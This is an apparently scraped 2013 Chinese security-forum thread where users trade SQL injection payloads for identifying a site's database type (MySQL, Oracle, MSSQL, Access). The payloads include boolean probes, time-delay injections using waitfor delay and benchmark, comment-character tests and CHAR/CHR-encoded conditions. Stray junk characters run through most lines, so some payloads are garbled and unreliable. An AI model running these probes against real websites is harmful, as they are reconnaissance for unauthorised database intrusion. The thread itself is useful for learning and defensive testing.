一个注射点如何最快速确认是什么类型数据库
2 s% y/ M* D U+ ^5 Z' rxsser (十根阳具有长短!!) | 2013-02-05 12:36; d/ C d- u2 j# t9 `0 m
假设这么一个注射点: p/ M9 R7 Y M9 X" [/ d
show.html?id=2' ]" N, e+ v. N/ M) l; z; r+ s0 Y
mysql:id=2 and version()>05 _& ~" E: s1 @
oracle:id=2 and '1'||'1'='11# U5 f) y% k% [* r
其他的欢迎补充+ C5 u6 M, x8 E* B" [, L
1#
+ ~7 s$ q4 g' O, Aupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47- s1 y/ T) i) `1 B; B- s3 d! O/ n+ D
Access:
2 m' I+ w% r: E' N: iaNd aSc(cHr(97))=97
' J3 l: u' x+ F; S! ^ b7 Rand exists(select id from MSysAccessObjects)1 T( I. f# f" _1 _& ^2 L, @
SQL Server:
! N% g/ O; j/ rand exists(select id from sysobjects)- y& J ] O% j) I5 o
and length(user)>0( ~, B7 l: S, Z5 t9 V( V; P. B
MySQL:1 J7 e" f. d3 T3 k: T4 Y
and length(user())>0
9 Y5 f/ S, g5 [/ y3 B2 q" k5 |2#
6 m! m5 p+ p3 hxsser (十根阳具有长短!!) | 2013-02-05 12:481 ]' x0 d( N4 R8 i N0 n/ v8 ]
@upload 如果这些都不是呢…0 @1 o9 ?: n$ W Z$ Q
3#) @. [) S ~' g) x& Q7 ?9 e
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03
2 n( F( @ k' h6 d5 H@xsser 不快速的,延时注入+ F& e3 N8 o# _# Y" g
不知道这样写对不对
% \' g5 c% i2 l" b9 J) Zmssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'# W P K2 v a' E; |7 [2 B6 I
mysql:id=2 and select benchmark(1e8,current_date());, m; x3 p9 U, P( U' b0 _, _3 C
4#
7 g6 A. \# {& @. S9 Y4 K8 v( \upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
: N' j3 q& I4 l' n0 q: M最快的貌似是看报错信息
7 l& w% K" v" Noracle error
" H( R2 a6 n. ?- v" n+ xmssql error; `0 \. Y( L6 I" R( Y& b
mysql error$ a' x# d9 l- `, D
5#% a( A Q4 Z6 ~; h$ H" t
Nimda (你们都是坏银~) | 2013-02-05 13:147 y/ `& P* O: f, I! x& i. p* x
小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)
! S3 y! C$ m! q( [' L1 R' N6#
; B$ v( ^, }+ J9 H* {2 `2 o8 _upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21" ~) g2 f9 }9 M% n( I
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:9 }5 J! U! m5 h1 [+ z
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
9 S* ]* o% C" @6 c/ v' @“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。
% s, L& v8 {) r) W. @% p$ F* N7#5 p$ _. j7 b" ?( d
_Evil (HackEnd) | 2013-02-05 13:33
) R: e3 S* c6 W. D. W; w: ePostgreSQL
( G& s" L0 l% Q9 ~* e! a8#( D) a n w. `: C: C" g: \0 N
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
( H7 J; W0 O d D$ U) A% r切换编码 and 1=1
0 B0 J' h( ~/ c, i+ i8 Xoracle:- l: s- ?2 k# r/ l' l
CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)8 U4 v0 D) X) f% g! s" d2 {9 b
mssql:
% y' m+ O2 ~8 JCHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49). | P2 J, B& }+ @7 S
mysql:
5 t9 b4 F3 v5 t1 B0 L" ]4 sCHAR(97, 110, 100, 32, 49, 61, 49)- G" k/ g" B3 H+ a8 {/ k
9#9 i o, d. `, f( q) i
xsser (十根阳具有长短!!) | 2013-02-05 14:31
! ^! h) a& L: c. o: @5 U@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?
+ R5 I% t( }# K: S! t, u10#
& H( s U* @/ o( ^- \ l/ X* oupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
* D& L- o! C* l' m$ _@xsser 是奇葩数据库类型的么?9 ]5 Z$ N2 z! h- i% j/ T
根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
, ~* p4 o. i* K7 O1 Y1 d; [4 D1.是否可以使用特定的函数来判断,该数据库特有的
1 P# e5 W' N8 e1 T2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等0 V7 z9 }8 u8 P/ X
3.是否可以编码查询
# i9 k) v: B% B3 E/ X! h- m4.是否显可以利用错信息- z8 `- l. W, a* ^% z2 o/ ^
5.是否存在数据库某些特性辅助判断9 ~9 ^. V3 \ X, T9 w' |) V& V
个人见解
, _' ^0 R# R; o% Z11#9 m8 _' \7 L6 d0 x/ Z
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55
8 s! M9 N$ b; u+ H$ X' s4 y/ V. k已收藏,mssql可以直接看到错误提示的吧~
7 e& x6 L. H4 F; \% r12#
$ i% t# K5 _. a0 }Passer_by | 2013-02-05 15:09
6 T( X" | m- \4 j! l# O1 E曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。9 x3 Q D) k8 O# j3 I( Q* s" I
from:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对